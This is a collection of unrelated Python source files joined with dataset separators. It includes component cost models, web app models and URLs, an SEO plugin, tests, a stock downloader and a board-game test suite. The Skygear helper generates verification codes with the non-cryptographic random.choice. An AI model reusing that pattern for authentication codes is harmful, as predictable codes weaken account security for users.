* :attr:`pn_base`: part number base (e.g. 00001 in BR-00001-AA)
* :attr:`revision`: two characters revision
* :attr:`details`: further details/description
* :attr:`partnumber` or :attr:`pn`: part number (e.g. BR-00001-AA)
* :attr:`materials`: list of materials
* :attr:`processes`: list of processes
* :attr:`fasteners`: list of fasteners
* :attr:`toolings`: list of toolings
* :attr:`drawings`: list of drawings (paths of files)
* :attr:`pictures`: list of pictures (paths of files)
* :attr:`parents`: parent assemblies of this component
* :attr:`components`: parts or assemblies of this component
* :attr:`quantity`: quantity of this component in the whole system
* :attr:`unitcost`: cost for one of this component
**Notes**:
* Two components are equal if their part number is equal.
"""
# arguments
self.filepath = filepath
self._system_label = system_label.upper()
self.name = name
self.pn_base = pn_base.upper()
self.revision = revision.upper()
self.details = details
# extras
self._quantity = 0
self.parents = set()
self.components = {}
self.materials = []
self.processes = []
self.fasteners = []
self.toolings = []
self.drawings = []
self.pictures = []
# check
if not self._validate_pn():
raise ValueError("Incorrect P/N (%s)" % self.pn)
def __str__(self):
return self.name
def __repr__(self):
return "<%s '%s'>" % (self.__class__.__name__, self.pn)
def __eq__(self, other):
return self.pn == other.pn
def __lt__(self, other):
# system label
if self._system_label != other._system_label:
return self._system_label > other._system_label
# assembly or part number
if self.pn_base[0] != other.pn_base[0]:
if self.pn_base[0] == "A":
return False
else:
return True
# designation
if self.pn_base[1] != other.pn_base[1]:
if self.pn_base[1] == "0":
return True
elif other.pn_base[2] == "0":
return False
else:
return self.pn_base[1] > other.pn_base[1]
# category
if self.pn_base[2] != other.pn_base[2]:
if self.pn_base[2] == "0":
return True
elif other.pn_base[2] == "0":
return False
else:
return self.pn_base[2] > other.pn_base[2]
# counter
if int(self.pn_base[3:5]) != int(other.pn_base[3:5]):
return int(self.pn_base[3:5]) > int(other.pn_base[3:5])
# revision
return self.revision < other.revision
def __hash__(self):
return hash(self.partnumber)
def _validate_pn(self):
return (
SYS_ASSY_PN.match(self.pn)
or SUB_ASSY_PN.match(self.pn)
or PART_PN.match(self.pn)
)
@property
def partnumber(self):
return "%s-%s-%s" % (self._system_label, self.pn_base, self.revision)
pn = partnumber
@property
def quantity(self):
"""
Returns the overall quantity of this component in a system.
"""
if not self.parents:
return self._quantity
else:
qty = 0
for parent in self.parents:
qty += parent.quantity * parent.components[self]
return qty
@property
def unitcost(self):
"""
Returns the unit cost of the component by adding the subtotal of the
materials, processes, fasteners and toolings as well as the parts
for assembly components.
"""
cost = self.tablecost
for component, quantity in self.components.items():
cost += component.unitcost * quantity
return cost
@property
def tablecost(self):
"""
Returns the cost of the materials, processes, fasteners and toolings.
For assemblies, the cost of other parts is NOT included.
"""
subtotal_getter = operator.attrgetter("subtotal")
cost = 0.0
cost += sum(map(subtotal_getter, self.materials))
cost += sum(map(subtotal_getter, self.processes))
cost += sum(map(subtotal_getter, self.fasteners))
cost += sum(map(subtotal_getter, self.toolings))
return cost
def get_hierarchy(self):
"""
Returns an ordered list of this component and its sub-components.
"""
hierarchy = [self]
for component in reversed(sorted(self.components.keys())):
hierarchy.extend(component.get_hierarchy())
return hierarchy
class Part(_Component):
"""
A part.
"""
pass
class Assembly(_Component):
"""
An assembly.
"""
pass
| StarcoderdataPython |
1988353 | import os
import json
from collections import OrderedDict
from flask_appbuilder import Model
from sqlalchemy import Table, Column, Integer, String, ForeignKey, Date, Float, Text
import sqlalchemy as sa
class IRT(Model):
__tablename__ = "iRT"
id = Column(Integer, primary_key=True)
field_name = Column(Text, unique=False, nullable=False)
describe = Column(Text, unique=False, nullable=False)
class GreenT(Model):
__tablename__ = 'GreenT'
id = Column(Integer, primary_key=True)
field_name = Column(Text, unique=False, nullable=False)
describe = Column(Text, unique=False, nullable=False)
class DSED(Model):
__tablename__ = 'DSED'
id = Column(Integer, primary_key=True)
field_name = Column(Text, unique=False, nullable=False)
describe = Column(Text, unique=False, nullable=False)
class DSE(Model):
__tablename__ = 'DSE'
id = Column(Integer, primary_key=True)
field_name = Column(Text, unique=False, nullable=False)
describe = Column(Text, unique=False, nullable=False)
class Company(Model):
__tablename__ = 'company'
id = Column(Integer, primary_key=True)
field_name = Column(Text, unique=False, nullable=False)
| StarcoderdataPython |
11369924 | <reponame>mpkato/openliveq<gh_stars>1-10
class QueryQuestion(object):
def __init__(self, query_id, question_id):
self.query_id = query_id
self.question_id = question_id
@classmethod
def readline(cls, line):
ls = [l.strip() for l in line.split("\t")]
if len(ls) != 2:
raise RuntimeError("Invalid format for %s: %s"
% (cls.__name__, line))
result = QueryQuestion(*ls)
return result
@classmethod
def load(cls, fp):
result = []
for line in fp:
elem = QueryQuestion.readline(line)
result.append(elem)
return result
| StarcoderdataPython |
6581677 | from NN.main.train import train
from NN.main.predict import predict | StarcoderdataPython |
6496251 | <filename>tests/test_auth.py
"""Unit tests for the authorization module."""
import unittest
if __name__ == '__main__':
pass
| StarcoderdataPython |
1819446 | """Infrastructure for detecting abstraction barrier violations."""
class AbstractionViolation(Exception):
pass
def datatype(obj):
return type(obj).__name__
# Generic abstract data type
class Abstract(object):
def __add__(self, other):
raise AbstractionViolation("Can't add {} object to {}".format(datatype(self), datatype(other)))
def __radd__(self, other):
raise AbstractionViolation("Can't add {} object to {}".format(datatype(self), datatype(other)))
def __eq__(self, other):
if isinstance(other, type(self)):
return other is self
raise AbstractionViolation("Can't use == on {} object and {}".format(datatype(self), datatype(other)))
def __ne__(self, other):
if isinstance(other, type(self)):
return other is not self
raise AbstractionViolation("Can't use != on {} object and {}".format(datatype(self), datatype(other)))
def __bool__(self):
raise AbstractionViolation("Can't use {} object as a boolean".format(datatype(self)))
def __getitem__(self, index):
raise AbstractionViolation("Can't use [] notation on {} object".format(datatype(self)))
def __contains__(self, other):
raise AbstractionViolation("Can't use contains notation on {} object".format(datatype(self)))
def __delitem__(self, other):
raise AbstractionViolation("Can't use del notation on {} object".format(datatype(self)))
def __iter__(self):
raise AbstractionViolation("Can't iterate on {} object".format(datatype(self)))
def __len__(self):
raise AbstractionViolation("Can't use len notation on {} object".format(datatype(self)))
def __setitem__(self, key, item):
raise AbstractionViolation("Can't use setitem notation on {} object".format(datatype(self)))
def __call__(self, *args, **kwargs):
raise AbstractionViolation("Can't call {} object".format(datatype(self)))
def __hash__(self):
return id(self)
class WordTime(Abstract):
def __init__(self, word, time):
self.a, self.b = word, time
def __repr__(self):
return '<WordTime {} {}>'.format(self.a, self.b)
word_time = WordTime
word = lambda u: u.a
elapsed_time = lambda u: u.b
old = {}
def swap_implementations(impl):
# save other implementations
old['word_time'] = impl.word_time, impl.word, impl.elapsed_time
# save our implementations
new_word_time = word_time, word, elapsed_time
# replace impl's implementations with ours
impl.word_time, impl.word, impl.elapsed_time = word_time, word, elapsed_time
def restore_implementations(impl):
impl.word_time, impl.word, impl.elapsed_time = old['word_time']
| StarcoderdataPython |
8048287 | <filename>plugins/seo_amp.py<gh_stars>1-10
"""manifest plugin"""
from typing import TYPE_CHECKING, List
from bs4 import BeautifulSoup
from markata import Markata, __version__
from markata.hookspec import hook_impl
if TYPE_CHECKING:
import frontmatter
from bs4.element import Tag
from urllib import request as ulreq
from PIL import ImageFile
def getsizes(uri, default_height=500, default_width=500):
# get file size *and* image size (None if not known)
# https://stackoverflow.com/questions/7460218/get-image-size-without-downloading-it-in-python
try:
with ulreq.urlopen(uri) as file:
p = ImageFile.Parser()
while True:
data = file.read(1024)
if not data:
break
p.feed(data)
if p.image:
return p.image.size
except BaseException:
return (
default_width,
default_height,
)
def _create_seo(
markata: Markata, soup: BeautifulSoup, article: "frontmatter.Post"
) -> List:
if article.metadata["description"] == "" or None:
article.metadata["description"] = " ".join(
[p.text for p in soup.find(id="post-body").find_all("p")]
).strip()[:120]
seo = [
*markata.seo,
{
"name": "og:author",
"property": "og:author",
"content": markata.config["author_name"],
},
{
"name": "og:author_email",
"property": "og:author_email",
"content": markata.config["author_email"],
},
{
"name": "og:type",
"property": "og:type",
"content": "website",
},
{
"name": "description",
"property": "description",
"content": article.metadata["description"],
},
{
"name": "og:description",
"property": "og:description",
"content": article.metadata["description"],
},
{
"name": "twitter:description",
"property": "twitter:description",
"content": article.metadata["description"],
},
{
"name": "og:title",
"property": "og:title",
"content": f'{article.metadata["title"]} | {markata.config["site_name"]}'[
:60
],
},
{
"name": "twitter:title",
"property": "twitter:title",
"content": f'{article.metadata["title"]} | {markata.config["site_name"]}'[
:60
],
},
{
"name": "og:image",
"property": "og:image",
"content": f'{markata.config["images_url"]}/{article.metadata["slug"]}-og.png',
},
{
"name": "twitter:image",
"property": "twitter:image",
"content": f'{markata.config["images_url"]}/{article.metadata["slug"]}-og.png',
},
{
"name": "og:image:width",
"property": "og:image:width",
"content": "1600",
},
{
"name": "og:image:width",
"property": "og:image:width",
"content": "900",
},
{
"name": "twitter:card",
"property": "twitter:card",
"content": markata.config["twitter_card"],
},
{
"name": "og:site_name",
"property": "og:site_name",
"content": markata.config["site_name"],
},
{
"name": "twitter:creator",
"property": "twitter:creator",
"content": markata.config["twitter_creator"],
},
{
"name": "title",
"property": "title",
"content": article.metadata["title"],
},
{
"name": "generator",
"property": "generator",
"content": f"markata {__version__}",
},
]
return seo
def _add_seo_tags(seo: List, article: "frontmatter.Post", soup: BeautifulSoup) -> None:
for meta in seo:
soup.head.append(_create_seo_tag(meta, soup))
def _create_seo_tag(meta: dict, soup: BeautifulSoup) -> "Tag":
tag = soup.new_tag("meta")
for k in meta:
tag.attrs[k] = meta[k]
return tag
def _clean_amp(soup: BeautifulSoup) -> None:
"""modifies soup as a side effect"""
for script in soup.find_all("script"):
script.decompose()
script = soup.new_tag(
"script", attrs={"src": "https://cdn.ampproject.org/v0.js", "async": True}
)
soup.head.append(script)
for button in soup.find_all("button"):
button.decompose()
body = soup.find("body")
for style in body.find_all("style"):
style.decompose()
for button in soup.find_all("button"):
button.decompose()
for iframe in soup.find_all("iframe"):
amp_iframe = soup.new_tag(
"amp-img",
attrs={
# causes amp failure if not a valid amp attribute
**iframe.attrs,
},
)
iframe.parent.insert(iframe.parent.contents.index(iframe), amp_iframe)
iframe.decompose()
for img in soup.find_all("img"):
img_size = getsizes(img.attrs["src"])
try:
amp_img = soup.new_tag(
"amp-img",
attrs={
# causes amp failure if not a valid amp attribute
# **img.attrs,
"src": img.attrs["src"],
"layout": "responsive",
"width": img_size[0],
"height": img_size[1],
},
)
except TypeError:
# img_size is sometimes returning None
amp_img = soup.new_tag(
"amp-img",
attrs={
# causes amp failure if not a valid amp attribute
# **img.attrs,
"src": img.attrs["src"],
"layout": "responsive",
"width": 500,
"height": 500,
},
)
img.parent.insert(img.parent.contents.index(img), amp_img)
img.decompose()
@hook_impl
def render(markata: Markata) -> None:
with markata.cache as cache:
for article in markata.iter_articles("add amp seo tags from seo.py"):
key = markata.make_hash(
"amp_seo",
"render",
article["content_hash"],
article.amp_html,
markata.site_name,
markata.url,
article.metadata["slug"],
markata.twitter_card,
article.metadata["title"],
markata.site_name,
str(markata.seo),
)
html_from_cache = cache.get(key)
if html_from_cache is None:
soup = BeautifulSoup(article.amp_html, features="lxml")
seo = _create_seo(markata, soup, article)
_add_seo_tags(seo, article, soup)
_clean_amp(soup)
canonical_link = soup.new_tag("link")
canonical_link.attrs["rel"] = "canonical"
canonical_link.attrs[
"href"
] = f'{markata.url}/{article.metadata["slug"]}/'
soup.head.append(canonical_link)
meta_url = soup.new_tag("meta")
meta_url.attrs["name"] = "og:url"
meta_url.attrs["property"] = "og:url"
meta_url.attrs["content"] = f'{markata.url}/{article.metadata["slug"]}/'
soup.head.append(meta_url)
# html = soup.prettify()
html = str(soup)
cache.add(key, html, expire=15 * 24 * 60 * 60)
else:
html = html_from_cache
article.amp_html = html
| StarcoderdataPython |
6635727 | # Copyright 2016 Oursky Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import string
import uuid
from skygear.utils.db import get_table
from sqlalchemy.sql import and_, desc, func, select
def get_verify_code(c, auth_id, code):
"""
Get a previously created verify code from database.
"""
code_table = get_table('_verify_code')
# Query the table, will only return the newest code if multiple exists
# for the same verification code
stmt = select([code_table]) \
.where(and_(code_table.c.auth_id == auth_id,
code_table.c.code == code)) \
.order_by(desc(code_table.c.created_at)) # noqa
result = c.execute(stmt)
return result.fetchone()
def add_verify_code(c, auth_id, record_key, record_value, code):
"""
Create a new verify code into the database.
"""
code_table = get_table('_verify_code')
values = {
'id': str(uuid.uuid4()),
'auth_id': auth_id,
'record_key': record_key,
'record_value': record_value,
'code': code.strip(),
'consumed': False,
'created_at': func.now(),
}
c.execute(code_table.insert().values(**values))
def set_code_consumed(c, code_id):
"""
Mark the specified verify code as consumed.
"""
code_table = get_table('_verify_code')
stmt = code_table.update().values(consumed=True) \
.where(code_table.c.id == code_id)
c.execute(stmt)
def generate_code(code_format):
"""
Generate a verify code according to the specified code format.
Return code string.
"""
if code_format == 'numeric':
return ''.join([random.choice(string.digits) for _ in range(6)])
else:
return ''.join([
random.choice(string.digits + string.ascii_lowercase)
for _ in range(8)
])
def verified_flag_name(record_key):
"""
Return the name for verified flag for the corresponding record key.
"""
return '{}_verified'.format(record_key)
| StarcoderdataPython |
1843386 | import torch
import torch.nn.functional as F
def projection_transH(entity, relation_norm):
return entity - torch.sum(entity * relation_norm, dim=1, keepdim=True) * relation_norm
def projection_transR(entity,proj_matrix,embedding_dim):
entity = entity.view(-1,embedding_dim,1)
proj_matrix = proj_matrix.view(-1,embedding_dim,embedding_dim)
return torch.matmul(proj_matrix,entity).view(-1,embedding_dim)
def projection_transD(entity,entity_proj,relation_proj):
return F.normalize(entity + torch.sum(entity * entity_proj,dim=1,keepdim=True) * relation_proj,dim=1,p=2)
| StarcoderdataPython |
3505894 | <gh_stars>0
"""Retrieve futures' settlement data from B3 exchange"""
__version__ = "0.02"
from b3_settlements.api import *
| StarcoderdataPython |
1739098 | from django.conf.urls import url
from django.contrib.auth import views as auth_views
from . import views, tables, api
app_name = 'dz'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^login/$', auth_views.login,
{'template_name': 'dz/tables/login.html'}, name='login'),
url(r'^tables/news/$', tables.news_list_view, name='news-list'),
url(r'^tables/news/export/$', tables.news_export_view, name='news-export'),
url(r'^tables/newsbox/(?P<pk>\d+)/$', tables.newsbox_view, name='newsbox-popup'),
url(r'^tables/newsbox/\d+/img/(?P<path>.*)$', tables.newsbox_img_redirect),
url(r'^tables/news/(?P<pk>\d+)/$', tables.form_view,
{'form_class': tables.NewsForm, 'next': 'news-list', 'admin_only': False},
name='news-form'),
url(r'^tables/tip/$', tables.tip_list_view, name='tip-list'),
url(r'^tables/tip/export/$', tables.tip_export_view, name='tip-export'),
url(r'^tables/tipbox/(?P<pk>\d+)/$', tables.tipbox_view, name='tipbox-popup'),
url(r'^tables/tip/(?P<pk>\d+)/$', tables.form_view,
{'form_class': tables.TipForm, 'next': 'tip-list', 'admin_only': False},
name='tip-form'),
url(r'^tables/crawl/$', tables.crawl_list_view, name='crawl-list'),
url(r'^tables/crawl/(?P<pk>\d+)/$', tables.form_view,
{'form_class': tables.CrawlForm, 'next': 'crawl-list', 'admin_only': True},
name='crawl-form'),
url(r'^tables/user/$', tables.user_list_view, name='user-list'),
url(r'^tables/user/(?P<pk>\d+)/$', tables.form_view,
{'form_class': tables.UserForm, 'next': 'user-list', 'admin_only': True},
name='user-form'),
url(r'^tables/schedule/$', tables.schedule_list_view, name='schedule-list'),
url(r'^tables/schedule/(?P<pk>\d+)/$', tables.form_view,
{'form_class': tables.ScheduleForm, 'next': 'schedule-list', 'admin_only': True},
name='schedule-form'),
url(r'^tables/action/crawl/$', tables.crawl_action_view, name='crawl-action'),
url(r'^tables/action/row/$', tables.row_action_view, name='row-action'),
url(r'^api/crawl/job/?$', api.api_crawl_job, name='api-job'),
url(r'^api/crawl/item/?$', api.api_crawl_item, name='api-item'),
url(r'^api/crawl/complete/?$', api.api_crawl_complete, name='api-complete'),
]
| StarcoderdataPython |
189039 | from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
class FileBrowser(QWidget):
def __init__(self):
QWidget.__init__(self)
self.init_gui_elements()
self.construct_gui()
self.update_gui()
def init_gui_elements(self):
self.layout = QVBoxLayout()
self.file_system_model = QFileSystemModel()
self.file_tree_view = QTreeView()
def construct_gui(self):
self.setLayout(self.layout)
self.layout.addWidget(self.file_tree_view)
def update_gui(self):
self.file_system_model.setNameFilters(('*.osu', '*.osr'))
self.file_system_model.setNameFilterDisables(False)
self.file_system_model.setRootPath(QDir.currentPath())
self.file_tree_view.setDragEnabled(True)
self.file_tree_view.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.file_tree_view.setModel(self.file_system_model)
self.file_tree_view.hideColumn(1) # Hide file size column
self.file_tree_view.hideColumn(2) # Hide file type column
self.file_tree_view.setRootIndex(self.file_system_model.index(QDir.currentPath()))
self.file_tree_view.header().setSectionResizeMode(QHeaderView.ResizeToContents)
self.file_tree_view.resizeColumnToContents(0) # Resize file name column | StarcoderdataPython |
208997 | <reponame>dstlmrk/pytwitterwall
#!/usr/bin/env python3.4
# coding=utf-8
import pytest
import flexmock
from pytwitterwall import Twitterwall
from io import StringIO
import builtins
import betamax
import os
import sys
from betamax.cassette import cassette
def sanitize_token(interaction, current_cassette):
# Exit early if the request did not return 200 OK because that's the
# only time we want to look for Authorization-Token headers
if interaction.data['response']['status']['code'] != 200:
return
headers = interaction.data['request']['headers']
token = headers.get('Authorization')
# If there was no token header in the response, exit
if token is None:
return
# Otherwise, create a new placeholder so that when cassette is saved,
# Betamax will replace the token with our placeholder.
if isinstance(token, list):
for item in token:
current_cassette.placeholders.append(
cassette.Placeholder(placeholder='<AUTH_TOKEN>', replace=item)
)
else:
current_cassette.placeholders.append(
cassette.Placeholder(placeholder='<AUTH_TOKEN>', replace=token)
)
with betamax.Betamax.configure() as config:
dir_path = os.path.dirname(os.path.realpath(__file__))
# tell Betamax where to find the cassettes
# make sure to create the directory
config.cassette_library_dir = dir_path + '/fixtures/cassettes'
# AUTH_FILE se nastavuje pomoci
# $ export AUTH_FILE="./conf/auth.cfg"
if 'AUTH_FILE' in os.environ:
# If the tests are invoked with an AUTH_FILE environ variable
API_KEY, API_SECRET = Twitterwall.get_credentials(
os.environ['AUTH_FILE']
)
# Always re-record the cassetes
# https://betamax.readthedocs.io/en/latest/record_modes.html
config.default_cassette_options['record_mode'] = 'all'
else:
if os.listdir(config.cassette_library_dir) == []:
raise Exception(
"Your AUTH_FILE is missing and you haven't any cassettes"
)
API_KEY, API_SECRET = ("api-key", "api-secret")
# Do not attempt to record sessions with bad fake token
config.default_cassette_options['record_mode'] = 'none'
# Filtering Sensitive Data
config.before_record(callback=sanitize_token)
def test_get_credentials_invalid():
with pytest.raises(SystemExit):
api_key, api_secret = Twitterwall.get_credentials(".")
def test_get_credentials():
expected_api_key = "#key"
expected_api_secret = "#secret"
flexmock(builtins, open=StringIO(
('[twitter]\nkey={}\nsecret={}\n').format(
expected_api_key, expected_api_secret
)
))
api_key, api_secret = Twitterwall.get_credentials(".")
assert api_key == expected_api_key
assert api_secret == expected_api_secret
def test__create_session_invalid(betamax_session):
with pytest.raises(SystemExit):
twitterwall = Twitterwall(
api_key="#", api_secret="#", session=betamax_session
)
def test_search_tweets(betamax_session):
twitterwall = Twitterwall(
session=betamax_session,
api_key=API_KEY,
api_secret=API_SECRET
)
response = twitterwall.search_tweets("python")
assert response.status_code == 200
assert isinstance(response.json()['statuses'], list)
def test_get_indices():
expected_first_index = 8
expected_second_index = 12
entity = {
"user_id": 1,
"indices": [expected_first_index, expected_second_index],
"index": 5
}
first_index, second_index = Twitterwall.get_indices(entity)
assert expected_first_index == first_index
assert expected_second_index == second_index
@pytest.mark.parametrize(
['text', 'entity', 'expected_tweet'],
[
(
"my test #tweet #python",
{"indices": [8, 14]},
"my test <a href=\"/search/tweet\">#tweet</a> #python"
),
(
"#python",
{"indices": [0, 7]},
"<a href=\"/search/python\">#python</a>"
)
],
)
def test_add_hashtag(text, entity, expected_tweet):
tweet = Twitterwall.add_hashtag(text, entity)
assert expected_tweet == tweet
@pytest.mark.parametrize(
['text', 'entity', 'expected_tweet'],
[
(
"my test @user #python",
{"indices": [8, 13]},
"my test <a href=\"/search/user\">@user</a> #python"
),
(
"@python",
{"indices": [0, 7]},
"<a href=\"/search/python\">@python</a>"
)
],
)
def test_add_user_mention(text, entity, expected_tweet):
tweet = Twitterwall.add_hashtag(text, entity)
assert expected_tweet == tweet
def test_add_url():
tweet = "my test with url python.cz #python"
entity = {
"indices": [17, 26],
"expanded_url": "http://www.python.cz",
"display_url": "python.cz"
}
expected_tweet = (
"my test with url"
" <a href=\"http://www.python.cz\">python.cz</a> #python"
)
edited_tweet = Twitterwall.add_url(tweet, entity)
assert expected_tweet == edited_tweet
def test_add_media():
tweet = "my media test"
entity = {
"indices": [13, 13],
"expanded_url": "http://www.python.cz",
"media_url": "http://youtube.com/23mg4"
}
expected_tweet = (
"my media test"
"<br><br><a href=\"http://www.python.cz\">"
"<img src=\"http://youtube.com/23mg4\"></a>"
)
edited_tweet = Twitterwall.add_media(tweet, entity)
assert expected_tweet == edited_tweet
@pytest.fixture
def testapp(betamax_session):
from pytwitterwall import app
app.config['TESTING'] = True
app.config['session'] = betamax_session
return app.test_client()
def test_title(testapp):
response = testapp.get('/')
assert 200 == response.status_code
assert '<h1>TwitterWall</h1>' in response.data.decode('utf-8')
def test_wall(testapp):
response = testapp.get('/search/hroncok/')
assert 200 == response.status_code
assert '<h1>twitterwall</h1>' in response.data.decode('utf-8')
| StarcoderdataPython |
8059707 | # Generated by Django 3.2.5 on 2021-07-07 03:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Configuration', '0002_auto_20210702_2224'),
]
operations = [
migrations.AddField(
model_name='paymentmethod',
name='environment',
field=models.CharField(blank=True, choices=[('d', 'Development'), ('p', 'Production')], default='d', help_text='Required for PayPal', max_length=1),
),
]
| StarcoderdataPython |
1781736 | <reponame>FredrikBakken/Norwegian-Stocks-Rating
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
### DOWNLOAD SCRIPT
###
### PURPOSE
### The purpose of the download script is to download all current stock data from the different norwegian markets,
### then storing the relevant data into the stocks database.
###
### @Author: <NAME>
### Email: fredrik.bakken(at)gmail.com
### Website: https://www.fredrikbakken.no/
### Github: https://github.com/FredrikBakken
###
### Last update: 15.10.2017
'''
import os
import csv
import shutil
import requests
import contextlib
from db import db_insert_stocks, db_search_stocks
#filename = 'data/tmp-stocks/stocks.json'
def download_stocks():
directory = 'data/tmp-stocks/'
file = 'stocks.json'
filename = directory + file
# Oslo Bors, Oslo Axess, and Merkur stock urls
markets = [['OSE', 'Oslo Børs'], ['OAX', 'Oslo Axess'], ['MERK', 'Merkur']]
if not os.path.exists(directory):
os.makedirs(directory)
# Delete old stocks overview file
with contextlib.suppress(FileNotFoundError):
os.remove(filename)
# Open session
with requests.Session() as s:
# Loop through defined markets
for x in range(len(markets)):
market_tag = markets[x][0]
market_name = markets[x][1]
# Download stocks on the market
download = s.get('http://www.netfonds.no/quotes/kurs.php?exchange=' + market_tag + '&sec_types=§ors=&ticks=&table=tab&sort=alphabetic')
decode = download.content.decode('iso-8859-1')
csr = csv.reader(decode.splitlines(), delimiter='\t')
stocklist = list(csr)
stocklist.pop(0)
# Write stocks to file
with open(filename, 'a', newline='') as file:
writer = csv.writer(file, delimiter=',')
for row in stocklist:
print("Download ticker: " + row[1])
row.append(market_name)
writer.writerow(row)
print('Updated stocks data has been downloaded to: ' + filename)
# Store stocks into the database
store_stocks(filename)
# Remove temporary stock data storage
if os.path.exists(directory):
shutil.rmtree(directory)
return True
def store_stocks(filename):
# Open temporary stocks file
with open(filename, 'rU') as file:
# Read line for line the temporary stocks file
for line in file:
cells = line.split(",")
name = str(cells[0])
ticker = str(cells[1])
source = str(cells[13].strip())
# Run through tests before inserting data to the database
if 'OBTEST' not in ticker:
exist_ticker = db_search_stocks(ticker)
if not exist_ticker:
db_insert_stocks(ticker, name, source)
print('New stocks has been stored in the database.')
return True
# Setting starting method
if __name__ == "__main__":
download_stocks()
| StarcoderdataPython |
6483718 | <filename>src/board_test.py<gh_stars>0
#!/usr/bin/env python
import unittest2
from board import PlayerType, Move, Board, InvalidMoveException, BoardSpec
__author__ = '<NAME>'
class SmallBoardTest(unittest2.TestCase):
def setUp(self):
board_spec = BoardSpec(3, 3, 3)
self.test_board = Board(board_spec)
def test_diagonal_win(self):
self.test_board.place_move(Move(2, 0, PlayerType.CIRCLE))
self.test_board.place_move(Move(1, 1, PlayerType.CIRCLE))
win_move = Move(0, 2, PlayerType.CIRCLE)
self.test_board.place_move(win_move)
assert self.test_board.is_winning_move(win_move) == True
class BoardTest(unittest2.TestCase):
def setUp(self):
board_spec = BoardSpec(10, 10, 5)
self.test_board = Board(board_spec)
def test_placing_circle_move(self):
self.test_board.place_move(Move(0, 0, PlayerType.CIRCLE))
assert(self.test_board.get_field(0, 0) == PlayerType.CIRCLE)
def test_placing_cross_move(self):
self.test_board.place_move(Move(0, 0, PlayerType.CROSS))
assert(self.test_board.get_field(0, 0) == PlayerType.CROSS)
def test_placing_invalid_cross_move(self):
self.test_board.place_move(Move(0, 0, PlayerType.CROSS))
with self.assertRaises(InvalidMoveException):
self.test_board.place_move(Move(0, 0, PlayerType.CROSS))
def test_placing_invalid_circle_move(self):
self.test_board.place_move(Move(0, 0, PlayerType.CIRCLE))
with self.assertRaises(InvalidMoveException):
self.test_board.place_move(Move(0, 0, PlayerType.CIRCLE))
def test_placing_move_outside_board(self):
test_move = Move(self.test_board.width, self.test_board.height,
PlayerType.CIRCLE)
with self.assertRaises(InvalidMoveException):
self.test_board.place_move(test_move)
def test_is_winning_move_vertical(self):
test_moves = [Move(0, i, PlayerType.CIRCLE) for i in range(4)]
for move in test_moves:
self.test_board.place_move(move)
winning_move = Move(0, 4, PlayerType.CIRCLE)
self.test_board.place_move(winning_move)
self.assertTrue(self.test_board.is_winning_move(winning_move))
def test_is_winning_move_horizontal(self):
test_moves = [Move(i, 0, PlayerType.CIRCLE) for i in range(4)]
for move in test_moves:
self.test_board.place_move(move)
winning_move = Move(4, 0, PlayerType.CIRCLE)
self.test_board.place_move(winning_move)
self.assertTrue(self.test_board.is_winning_move(winning_move))
def test_is_winning_move_diagonal_trivial(self):
test_moves = [Move(i, i, PlayerType.CIRCLE) for i in range(4)]
for move in test_moves:
self.test_board.place_move(move)
winning_move = Move(4, 4, PlayerType.CIRCLE)
self.test_board.place_move(winning_move)
self.assertTrue(self.test_board.is_winning_move(winning_move))
def test_is_winning_move_diagonal_complex(self):
test_moves = [Move(x, y, PlayerType.CIRCLE) for x, y in [(5, 5), (7, 3), (8, 2), (9, 1)]]
for move in test_moves:
self.test_board.place_move(move)
winning_move = Move(6, 4, PlayerType.CIRCLE)
self.test_board.place_move(winning_move)
self.assertTrue(self.test_board.is_winning_move(winning_move))
def test_is_winning_move_horizontal_inter(self):
test_moves = [Move(i, 0, PlayerType.CIRCLE) for i in range(2)]
for move in test_moves:
self.test_board.place_move(move)
test_moves = [Move(i, 0, PlayerType.CIRCLE) for i in range(3, 5)]
for move in test_moves:
self.test_board.place_move(move)
winning_move = Move(2, 0, PlayerType.CIRCLE)
self.test_board.place_move(winning_move)
self.assertTrue(self.test_board.is_winning_move(winning_move))
def test_is_winning_move_vertical_inter(self):
test_moves = [Move(0, i, PlayerType.CIRCLE) for i in range(2)]
for move in test_moves:
self.test_board.place_move(move)
test_moves = [Move(0, i, PlayerType.CIRCLE) for i in range(3, 5)]
for move in test_moves:
self.test_board.place_move(move)
winning_move = Move(0, 2, PlayerType.CIRCLE)
self.test_board.place_move(winning_move)
self.assertTrue(self.test_board.is_winning_move(winning_move))
def test_is_winning_move_diagonal_inter(self):
test_moves = [Move(i, i, PlayerType.CIRCLE) for i in range(2)]
for move in test_moves:
self.test_board.place_move(move)
test_moves = [Move(i, i, PlayerType.CIRCLE) for i in range(3, 5)]
for move in test_moves:
self.test_board.place_move(move)
winning_move = Move(2, 2, PlayerType.CIRCLE)
self.test_board.place_move(winning_move)
self.assertTrue(self.test_board.is_winning_move(winning_move))
def test_is_not_winning_move(self):
not_winning_move = Move(2, 2, PlayerType.CIRCLE)
self.test_board.place_move(not_winning_move)
self.assertFalse(self.test_board.is_winning_move(not_winning_move))
def tearDown(self):
self.test_board = None
# eof
| StarcoderdataPython |
1625319 | <filename>lists/admin.py
from django.contrib import admin
from lists.models import List
class ListAdmin(admin.ModelAdmin):
list_display = ('name', 'description', 'type', 'user', 'privacy')
list_filter = ('type', 'user', 'privacy')
search_fields = ('name', 'description')
admin.site.register(List, ListAdmin)
| StarcoderdataPython |
9660534 | #!/usr/bin/env python
from pydpiper.pipeline import CmdStage, Pipeline
from atoms_and_modules.registration_functions import isFileHandler
import atoms_and_modules.registration_functions as rf
from os.path import abspath, basename, splitext, join
from os import curdir
import pydpiper.file_handling as fh
import sys
import fnmatch
import re
import copy
class mincANTS(CmdStage):
def __init__(self,
inSource,
inTarget,
output=None,
logFile=None,
defaultDir="transforms",
blur=[-1, 0.056],
gradient=[False, True],
target_mask=None, #ANTS only uses one mask
similarity_metric=["CC", "CC"],
weight=[1,1],
iterations="100x100x100x150",
radius_or_histo=[3,3],
transformation_model="SyN[0.1]",
regularization="Gauss[2,1]",
useMask=True):
